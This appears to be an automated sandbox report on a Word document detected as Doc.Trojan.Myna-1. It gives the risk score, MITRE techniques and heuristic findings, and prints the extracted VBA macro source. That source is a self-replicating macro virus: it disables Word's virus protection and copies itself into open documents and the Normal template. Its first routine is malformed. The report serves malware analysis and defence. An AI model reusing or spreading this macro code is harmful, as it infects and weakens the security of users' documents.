MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro code attempts to insert itself into the document and likely executes further malicious actions, such as downloading a payload. The ClamAV detection of 'Doc.Trojan.Myna-1' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Myna-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Myna-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3120 bytes |
SHA-256: 609b3e79dca6147267f04160b27dc5b05ba8eed82c06016c5cc12bbe60693538 |
|||
|
Detection
ClamAV:
Doc.Trojan.Myna-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
'
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
Options.VirusProtection = False
answer = "MYNAMEISVIRUS"
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If Count <> 1 Then
Count = Count + 1
' Documents.Add
End If
If Documents.Count <> 0 Then
For i = 1 To Documents.Count
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
Private Sub Document_Open()
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
answer = "MYNAMEISVIRUS"
Options.VirusProtection = False
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If Count <> 1 Then
Count = Count + 1
' Documents.Add
End If
If Documents.Count <> 0 Then
For i = 1 To Documents.Count
For Each xitem In Documents(i).VBProject.VBComponents
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.